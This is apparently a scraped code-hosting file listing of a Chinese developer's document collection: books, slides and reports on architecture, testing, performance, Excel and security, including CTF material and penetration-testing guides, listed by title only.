物联网相关运维系统.xmind 2019/3/files/安全/CTF资料/CTF攻防部署.png 14 months ago
界面&后台的合并与分离.xmind 2019/3/files/安全/CTF资料/CTF攻防部署.png 14 months ago
百度Elasticsearch实践-高攀.pptx 2019/3/files/后端/SUN+Java编码规范中文版.pdf 14 months ago
程序员必读之软件架构.epub 2019/3/files/后端/SUN+Java编码规范中文版.pdf 14 months ago
竹光+蚂蚁金服移动,,,1507976106.pdf 2019/3/files/测试/pts-performance-system-cn-zh-2016-06-08.pdf 14 months ago
缓存服务技术.xmind 2019/3/files/安全/CTF资料/CTF攻防部署.png 14 months ago
编写可读代码的艺术-完整版(带书签).pdf 2019/3/files/后端/[Java泛型和集合].(Java.Generics.and.Collections).pdf 14 months ago
网络编程.xmind 2019/3/files/安全/CTF资料/CTF攻防部署.png 14 months ago
设计模式-23.xmind 2019/3/files/安全/CTF资料/CTF攻防部署.png 14 months ago
设计模式之禅(第2版)-5.pdf 2019/3/files/后端/SUN+Java编码规范中文版.pdf 14 months ago
设计模式认识.xmind 2019/3/files/安全/CTF资料/CTF攻防部署.png 14 months ago
身份认证.xmind 2019/3/files/安全/CTF资料/CTF攻防部署.png 14 months ago
软件构架实践_第二版_林_巴斯等著.pdf 2019/3/files/后端/[Java泛型和集合].(Java.Generics.and.Collections).pdf 14 months ago
软件需求最佳实践.pdf 2019/3/files/后端/[Java泛型和集合].(Java.Generics.and.Collections).pdf 14 months ago
阿里 Alibaba Cloud CodePipeline 基于Jenkins的CI _ CD探索之路 2017.pdf 2019/3/files/测试/pts-performance-system-cn-zh-2016-06-08.pdf 14 months ago
(杨晖)Swift 服务器端编程.pdf 2019/3/files/测试/pts-performance-system-cn-zh-2016-06-08.pdf 14 months ago
(王文槿)函数式的设计模式.pdf 2019/3/files/测试/pts-performance-system-cn-zh-2016-06-08.pdf 14 months ago
02.项目跟踪模板 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
回答问题的相关材料 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
库存预警报表 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
00.Excel学习视频链接.xlsx 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
01.邮件工具.xlsm 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
02.项目跟踪模板.zip 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
03.潜在客户跟踪报表.xlsx 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
04.销量监控报表.xlsx 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
05.订单跟踪报表.xlsx 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
06.库存预警报表.zip 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
07.收入分析报表.xlsx 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
08.销量预测及目标制定.xlsm 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
09.报销自动化模板.zip 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
99.打造适合你的Excel快捷键清单.xlsx 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
excel模板.zip 2019/3/files/在企业级案例中学习Excel/00.Excel学习视频链接.xlsx 14 months ago
CTF资料 2019/3/files/安全/CTF资料/CTF攻防部署.png 14 months ago
data 2019/3/8.1.md 14 months ago
source 2019/3/files/安全/CTF资料/CTF攻防部署.png 14 months ago
vipread.com_信息安全研究2019.5.1 2019\3\files\安全\vipread.com_信息安全研究2019.5.1\2018网民网络安全感满意度调查.pdf 14 months ago
代碼靜態檢查 2019\3\files\安全\代碼靜態檢查\sonar-pdfreport-plugin-3.0.1.jar 14 months ago
安全报告 2019/3/files/安全/安全报告/2019 年《互联网安全威胁报告》.pdf 14 months ago
01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
01数据安全-扑腾无止境.pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
02_电商时代的数据安全(唯品会_向坤).pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
02通用型漏洞的应急响应.pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
03_轻松玩转“互联网+”漏洞(四叶草安全_朱利军).pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
04_账号风控-从从被忽悠到会忽悠(小米_徐炳镇).pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
05我要我的云安全.pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
06_探寻业务安全的极(基)点(江南天安_张洪骏).pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
07风控产品与产品风控.pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
08单点登录与安全网关实践.pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
0day2.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
1-5-内建安全的软件开发-刘庆华.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
1OWASP.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
2018 全球科技資安風險與法遵議題.pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
2018国民旅游消费新趋势洞察报告.pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
2018,你不知道的前端黑科技.pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
3-美团稳定性保障平台Rhino.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
58到家技术架构快速规划与落地.pdf 2019\3\files\安全\01_悬崖-业务安全工作二三事(唯品会_傅奎).pdf 14 months ago
620995+Web应用安全权威指南---文字版.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
API 平台的安全实践.pdf 2019\3\files\安全\API 平台的安全实践.pdf 14 months ago
BurpSuite 实战指南.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
DevOps 與應用程式中的特權存取安全.pdf 2019\3\files\安全\DevOps 與應用程式中的特權存取安全.pdf 14 months ago
DevSecOps在金融机构落地实践.pdf 2019\3\files\安全\DevOps 與應用程式中的特權存取安全.pdf 14 months ago
DevSecOps工具链实践.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
Docker逃逸:从一个进程崩溃讲起.pdf 2019\3\files\安全\DevOps 與應用程式中的特權存取安全.pdf 14 months ago
FreeBuf 2018金融行业应用安全态势报告.pdf 2019\3\files\安全\FreeBuf 2018金融行业应用安全态势报告.pdf 14 months ago
Freebuf 企业级安全服务解决方案.pdf 2019\3\files\安全\API 平台的安全实践.pdf 14 months ago
HTTPS 最佳安全实践.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
ISC 2018 DevSecOps.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
Java反序列化实战.pdf 2019\3\files\安全\API 平台的安全实践.pdf 14 months ago
Nmap渗透测试指南.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
S-SDL.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
S-SDL企业应用实践 (1).pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
S-SDL企业应用实践.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
Talk Is Cheap:Web 2.0 云攻击.pdf 2019\3\files\安全\Talk Is Cheap:Web 2.0 云攻击.pdf 14 months ago
TalkingData 2017+十一月电商广告热点榜单.pdf 2019\3\files\安全\TalkingData 2017+十一月电商广告热点榜单.pdf 14 months ago
VxWorks Fuzzing 之道——VxWorks 工控实时操作系统漏洞挖掘揭秘.pdf 2019\3\files\安全\TalkingData 2017+十一月电商广告热点榜单.pdf 14 months ago
WAF漏洞挖掘及安全架构v4 黄登.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
Web安全开发指南.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
Web安全深度剖析.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
Web应用安全性测试.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
XSS挖掘与攻击面延伸.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
[IT安全面试攻略].Chris.Butler等.扫描版[ED2000.COM].pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
acr2018final.pdf 2019\3\files\安全\FreeBuf 2018金融行业应用安全态势报告.pdf 14 months ago
alisec mobile security 潘爱民.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
data.zip 2019/3/9.md 14 months ago
security geek 2016 A.pdf 2019\3\files\安全\Talk Is Cheap:Web 2.0 云攻击.pdf 14 months ago
security geek 2017 q3.pdf 2019\3\files\安全\Talk Is Cheap:Web 2.0 云攻击.pdf 14 months ago
security-geek-2016-A.pdf 2019\3\files\安全\security-geek-2016-A.pdf 14 months ago
security-geek-2016-B.pdf 2019\3\files\安全\security-geek-2016-A.pdf 14 months ago
security-geek-2017-q4.pdf 2019\3\files\安全\security-geek-2017-q4.pdf 14 months ago
security-geek-2018-q1.pdf 2019\3\files\安全\Talk Is Cheap:Web 2.0 云攻击.pdf 14 months ago
security-geek-2018-q2.pdf 2019\3\files\安全\Talk Is Cheap:Web 2.0 云攻击.pdf 14 months ago
security-geek-2018-q3.pdf 2019\3\files\安全\security-geek-2018-q3.pdf 14 months ago
security-geek-2018-q4.pdf 2019\3\files\安全\security-geek-2018-q4.pdf 14 months ago
vipread.com_2_1456886828.pdf 2019\3\files\安全\vipread.com_信息安全研究2019.5.1.zip 14 months ago
vipread.com_7.议题七.从零信任谈起.深入剖析以人为核心的业务安全.张坤鹏.20190118.pdf 2019\3\files\安全\vipread.com_7.议题七.从零信任谈起.深入剖析以人为核心的业务安全.张坤鹏.20190118.pdf 14 months ago
vipread.com_OWASP.以开源的方式支撑企业应用安全体系化建设.pdf 2019\3\files\安全\vipread.com_OWASP.以开源的方式支撑企业应用安全体系化建设.pdf 14 months ago
vipread.com_OWASP项目分享.应用软件安全级别验证参考标准.ASVS.pdf 2019\3\files\安全\vipread.com_7.议题七.从零信任谈起.深入剖析以人为核心的业务安全.张坤鹏.20190118.pdf 14 months ago
vipread.com_《移动.App.漏洞引发的思考》神月信安.陈东新.061118.pdf 2019\3\files\安全\vipread.com_7.议题七.从零信任谈起.深入剖析以人为核心的业务安全.张坤鹏.20190118.pdf 14 months ago
vipread.com_企业SDL实践与经验.pdf 2019\3\files\安全\vipread.com_7.议题七.从零信任谈起.深入剖析以人为核心的业务安全.张坤鹏.20190118.pdf 14 months ago
vipread.com_信息安全研究2019.5.1.zip 2019\3\files\安全\vipread.com_信息安全研究2019.5.1.zip 14 months ago
《渗透测试实践指南+必知必会的工具与方法》.((美)Patrick+Engebretson).[PDF]@ckook.pdf 2019/3/files/安全/《渗透测试实践指南+必知必会的工具与方法》.((美)Patrick+Engebretson).[PDF]@… 14 months ago
一起跨国网络诈骗案件的始末.pdf 2019\3\files\安全\TalkingData 2017+十一月电商广告热点榜单.pdf 14 months ago
不可忽视的业务安全问题-唯品会.pdf 2019\3\files\安全\不可忽视的业务安全问题-唯品会.pdf 14 months ago
不可忽视的业务安全问题.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
个人数据保护与企业数据权属.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
二维码安全问题报告.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
从刑事个案看信息保护与数据利用.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
从攻击者视角看待安全.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
从高危漏洞看电商金融安全.pdf 2019\3\files\安全\TalkingData 2017+十一月电商广告热点榜单.pdf 14 months ago
企业如何构造安全防护堡垒.pdf 2019/3/files/安全/企业如何构造安全防护堡垒.pdf 14 months ago
企业安全之路.pdf 2019/3/files/安全/企业如何构造安全防护堡垒.pdf 14 months ago
企业漏洞管理与持续化追踪建设浅析.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
企业级代码安全最佳实践.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
使用API网关快速开放Serverless服务.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
信息安全从运维向运营进化.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
北大软件部门经理马森、高庆 - 基于静态分析的程序缺陷自动检测与自动修复技术.pdf 2019\3\files\安全\不可忽视的业务安全问题-唯品会.pdf 14 months ago
唯品会安全.pdf 2019/3/files/安全/企业如何构造安全防护堡垒.pdf 14 months ago
唯品会安全应急杂谈.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
唯品会日日志平台建设.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
基于内网流量的高级威胁检测.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
基于威胁博弈理论的决策级融合模型.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
基于移动威胁情报的安全价值观.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
基于零信任的身份安全理念、架构及实践.pdf 2019\3\files\安全\API 平台的安全实践.pdf 14 months ago
多种网络环境下应急响应的探索.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
大数据技术助力金融业务安全.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
大规模分布式存储系统:原理解析与架构实战-杨传辉[6寸PDF mobi epub kindle版].pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
威胁情报的业务安全应用价值.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
安全专项测试方案 (1).pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
安全专项测试方案.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
安全事件的发现、分析、响应与取证.pdf 2019\3\files\安全\不可忽视的业务安全问题-唯品会.pdf 14 months ago
安全加密风控.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
安全测试中一些有趣的姿势和技巧.pdf 2019\3\files\安全\不可忽视的业务安全问题-唯品会.pdf 14 months ago
安全的复杂与复杂的安全.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
安全管理到安全评审.pdf 2019\3\files\安全\不可忽视的业务安全问题-唯品会.pdf 14 months ago
安全运营中威胁情报的应用分享.pdf 2019\3\files\安全\不可忽视的业务安全问题-唯品会.pdf 14 months ago
安恒 务实的网络安全.pdf 2019\3\files\安全\TalkingData 2017+十一月电商广告热点榜单.pdf 14 months ago
师克在和不在众.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
应用安全威胁及解决方案.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
应用安全高级测试.pdf 2019/3/files/安全/企业如何构造安全防护堡垒.pdf 14 months ago
开发安全的 API 所需要核对的清单.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
微服务监控与优化.pdf 2019/3/files/安全/企业如何构造安全防护堡垒.pdf 14 months ago
支付卡行业 (PCI) 支付应用程序数据安全标准.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
数据驱动安全 ——滴滴安全基础数据建设.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
永别了SQL注入.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
淘宝前台系统性能分析与优化.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
淘宝性能测试白皮书V0.3.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
用行为驱动开发和面向接口的设计做微服务开发.pdf 2019/3/files/安全/企业如何构造安全防护堡垒.pdf 14 months ago
甲方企业整体安全建设思路及坑点.pdf 2019\3\files\安全\TalkingData 2017+十一月电商广告热点榜单.pdf 14 months ago
电商安全坑.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
百度 企业安全监控经验教训分享.pdf 2019\3\files\wifi\wirelessmon.zip 14 months ago
移劢互联时代的隐私保护.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
移动安全威胁分析和安全建设.pdf 2019/3/files/安全/1-5-内建安全的软件开发-刘庆华.pdf 14 months ago
移动应用是如何通过WebView窃取你的隐私的.pdf 2019\3\files\安全\TalkingData 2017+十一月电商广告热点榜单.pdf 14 months ago
移动恶意代码威胁的针对性泛化思考.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
端口渗透.pdf 2019\3\files\安全\API 平台的安全实践.pdf 14 months ago
细数安卓 APP 那些远程攻击漏洞.pdf 2019\3\files\安全\TalkingData 2017+十一月电商广告热点榜单.pdf 14 months ago
网络安全北向技术和方法探究.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
网络游戏安全揭密.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
让我们做Web安全测试吧.pdf 2019\3\files\安全\vipread.com_信息安全研究2019.5.1.zip 14 months ago
谈谈安卓的 Intent 注入.pdf 2019\3\files\安全\TalkingData 2017+十一月电商广告热点榜单.pdf 14 months ago
金融科技助力支付安全.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
阿里云合作伙伴研发-安全开发规范.pdf 2019/3/files/运维/Aomi_Pay_Threat_Model.tm7 14 months ago
阿里云威胁检测实践.pdf 2019\3\files\安全\不可忽视的业务安全问题-唯品会.pdf 14 months ago
陈建 企业信息安全实践 ISC2018.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
面向全流量的网络APT智能检测方法.pdf 2019\3\files\安全\ISC 2018 DevSecOps.pdf 14 months ago
Disruptor+入门+-+v1.0.pdf 2019/3/files/性能/Disruptor+入门+-+v1.0.pdf 14 months ago
Google工作整理术(解读版).epub 2019\3\files\性能\Google工作整理术(解读版).epub 13 months ago
JMeter中文教程.pdf 2019/3/files/性能/Disruptor+入门+-+v1.0.pdf 14 months ago
JMeter使用技巧.doc 2019/3/files/性能/Disruptor+入门+-+v1.0.pdf 14 months ago
JProfiler入门教程-1.1.pdf 2019/3/files/性能/Disruptor+入门+-+v1.0.pdf 14 months ago
Java 8函数式编程 (图灵程序设计丛书).epub 2019\3\files\性能\Google工作整理术(解读版).epub 13 months ago
Java性能权威指南 (图灵程序设计丛书).epub 2019\3\files\性能\Google工作整理术(解读版).epub 13 months ago
Jmeter新手入门.docx 2019/3/files/性能/Disruptor+入门+-+v1.0.pdf 14 months ago
Performance_Matters_v3(Chinese).pptx 2019/3/files/性能/Disruptor+入门+-+v1.0.pdf 14 months ago
Spring实战(第4版).epub 2019\3\files\性能\Spring实战(第4版).epub 13 months ago
Vega3_Specs_v1.pdf 2019\3\files\性能\Vega3_Specs_v1.pdf 13 months ago
Vim实用技巧:使用模式入门篇(第2版).epub 2019\3\files\性能\Google工作整理术(解读版).epub 13 months ago
WP - JVM Performance Study.pdf 2019\3\files\性能\Vega3_Specs_v1.pdf 13 months ago
Zing_Performance_eBook_v1.pdf 2019\3\files\性能\Vega3_Specs_v1.pdf 13 months ago
使用Jmeter进行性能测试.pdf 2019/3/files/性能/Disruptor+入门+-+v1.0.pdf 14 months ago
利用JMeter进行Web测试.ppt 2019/3/files/性能/Disruptor+入门+-+v1.0.pdf 14 months ago
程序员必读之软件架构.epub 2019\3\files\性能\Google工作整理术(解读版).epub 13 months ago
编写高质量代码之Java.epub 2019\3\files\性能\Spring实战(第4版).epub 13 months ago
编程珠玑(第2版·修订版) - [美]乔恩·本特利.epub 2019\3\files\性能\Google工作整理术(解读版).epub 13 months ago
重来2:更为简单高效的远程工作方式.epub 2019\3\files\性能\Google工作整理术(解读版).epub 13 months ago
课件 2019/3/files/抢救你的学习力/抢救你的学习力 目的篇.txt 14 months ago
抢救你的学习力 目的篇.txt 2019/3/files/抢救你的学习力/抢救你的学习力 目的篇.txt 14 months ago
抢救你的学习力(三、记忆力).doc 2019/3/files/抢救你的学习力/抢救你的学习力 目的篇.txt 14 months ago
抢救你的学习力(二、注意力).doc 2019/3/files/抢救你的学习力/抢救你的学习力 目的篇.txt 14 months ago
抢救你的学习力(五、谈发展)(完).doc 2019/3/files/抢救你的学习力/抢救你的学习力 目的篇.txt 14 months ago
抢救你的学习力(四、思维力).doc 2019/3/files/抢救你的学习力/抢救你的学习力 目的篇.txt 14 months ago
2018年美团点评技术年货(上).pdf 2019\3\files\架構\2018年美团点评技术年货(上).pdf 14 months ago
2018年美团点评技术年货(下).pdf 2019\3\files\架構\2018年美团点评技术年货(上).pdf 14 months ago
杭州第二届测试沙龙PPT 2019/3/files/测试/杭州第二届测试沙龙PPT/1全链路压测实践(终稿).pdf 14 months ago
软件测试 2019/3/files/测试/软件测试/02 客户的需求观.pdf 14 months ago
(已加+终)百度持续交付之旅_沙龙稿.pdf 2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf 14 months ago
038. 长尾理论.pdf 2019/3/files/前端/如何构建高质量、高效率的前端体系 zhuoying.pptx 14 months ago
20061031_3GSS_NSFT_业务管理_测试用例.xls 2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls 14 months ago
20061031_3GSS_NSFT_预警执行和展示_测试用例.xls 2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls 14 months ago
20061031_3GSS_NSFT_预警配置与审核_测试用例.xls 2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls 14 months ago
2007年QA典型百大MISSBUG总结.doc 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
2018技术趋势.pdf 2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf 14 months ago
58到家测试环境治理-范令凯.pdf 2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf 14 months ago
API+Everything+–+饿了么基于效率提升的API架构.pdf 2019/3/files/前端/如何构建高质量、高效率的前端体系 zhuoying.pptx 14 months ago
API权限控制与安全管理.doc 2019/3/files/测试/API权限控制与安全管理.doc 14 months ago
API架构演进.pdf 2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf 14 months ago
API测试case.xlsx 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
Adobe Photoshop CC 2017图像处理教程.epub 2019\3\files\性能\Google工作整理术(解读版).epub 13 months ago
App快速自动化回归测试体系.pdf 2019\3\files\测试\App快速自动化回归测试体系.pdf 14 months ago
AutoCAD自动化测试数据挖掘:提高自动化测试效率.pdf 2019\3\files\测试\App快速自动化回归测试体系.pdf 14 months ago
C1000K.ppt 2019/3/files/测试/C1000K.ppt 14 months ago
DevOps下的质保测试方法.pdf 2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf 14 months ago
Excel2010培训教程(入门)--目前最全的基础培训教材.ppt 2019/3/files/后端/《Java多线程编程核心技术》源代码/07 第七章/threadRunSyn/src/test/run/R… 14 months ago
Fiddler调试权威指南 (美)劳伦斯著.pdf 2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf 14 months ago
Fiddler调试权威指南+(美)劳伦斯著.pdf 2019/3/files/测试/Fiddler调试权威指南+(美)劳伦斯著.pdf 14 months ago
FindBugs安装及使用说明.docx 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
Fuzzing 测试技术综述.pdf 2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf 14 months ago
Fuzzing-模糊测试--强制性安全漏洞发掘.doc 2019/3/files/测试/API权限控制与安全管理.doc 14 months ago
JAVA性能调优--内存管理.pptx 2019/3/files/测试/API权限控制与安全管理.doc 14 months ago
JMeter使用技巧.doc 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
JProfiler入门教程-1.1.pdf 2019/3/files/测试/Linux命令行与shell脚本编程大全.第3版.pdf 14 months ago
JVM分享 Java Program in Action ——Java程序癿编译、加载不执行.pdf 2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf 14 months ago
Java企业应用 性能优化 原则 , 方法 与 策略.pdf 2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf 14 months ago
Java性能优化指南, 及唯品会的实战.pdf 2019/3/files/测试/(已加+终)百度持续交付之旅_沙龙稿.pdf 14 months ago
Jmeter新手入门.docx 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
LaTeX大家来学.pdf 2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf 14 months ago
Linux Shell脚本攻略.pdf 2019/3/files/测试/Linux命令行与shell脚本编程大全.第3版.pdf 14 months ago
Linux命令行与shell脚本编程大全.第3版.pdf 2019/3/files/测试/Linux命令行与shell脚本编程大全.第3版.pdf 14 months ago
LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf 2019/3/files/测试/LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf 14 months ago
LoadRunner函数大全之中文解释.doc 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
LoadRunner函数大全之中文解释.pdf 2019/3/files/测试/LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf 14 months ago
LoadRunner压力测试实例.doc 2019/3/files/后端/《Java多线程编程核心技术》源代码/07 第七章/threadRunSyn/src/test/run/R… 14 months ago
Loadrunner脚本开发规范 .doc 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
Microservice_security.pdf 2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf 14 months ago
Nginx开发从入门到精通.pdf 2019/3/files/测试/LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf 14 months ago
OSGI入门与实践.pptx 2019/3/files/测试/OSGI入门与实践.pptx 14 months ago
OWASP Top 10 2017 10项最严重的 Web 应用程序安全风险.pdf 2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf 14 months ago
OWASP-mobile-安全测试-APK.ppt 2019/3/files/测试/OSGI入门与实践.pptx 14 months ago
OWASP测试指南(中文).doc 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
PMD使用说明.doc 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
PTR140-liuguoqiang.ppt 2019/3/files/测试/C1000K.ppt 14 months ago
PTS-5-2-1-01.doc 2019/3/files/测试/C1000K.ppt 14 months ago
Peach+Fuzzer+官方文档中文版.doc 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
Performance_Matters_v3(Chinese).pptx 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
Pre-briefingAM.ppt 2019/3/files/测试/C1000K.ppt 14 months ago
QTP9.0编程常用方法及实例心得.doc 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
REST API安全测试的思路.pdf 2019/3/files/测试/LoadRunner_Winsocket协议知识总结V1.1(修正版).pdf 14 months ago
RobotFramework 自动化测试框架安装手册.docx 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
SSE_TT01测试计划.xls 2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls 14 months ago
SSE_TT02测试大纲.xls 2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls 14 months ago
SSE_TT03测试用例.xls 2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls 14 months ago
SSE_TT04测试问题卡.xls 2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls 14 months ago
SSE_TT05测试总结报告.xls 2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls 14 months ago
SSE_TT06性能测试报告.xls 2019/3/files/测试/20061031_3GSS_NSFT_业务管理_测试用例.xls 14 months ago
Selenium自动化测试:基于 Python 语言(异步图书).epub 2019\3\files\性能\Google工作整理术(解读版).epub 13 months ago
Specification by Example(实例化需求).pdf 2019/3/files/测试/Fiddler调试权威指南+(美)劳伦斯著.pdf 14 months ago
The Cucumber Book.pdf 2019/3/files/后端/30种java技术框架-方案架构图汇总.pdf 14 months ago
Threat Modeling Tool 2016 Getting Started Guide.docx 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
Threat Modeling Tool 2016 User Guide.docx 2019/3/files/测试/2007年QA典型百大MISSBUG总结.doc 14 months ago
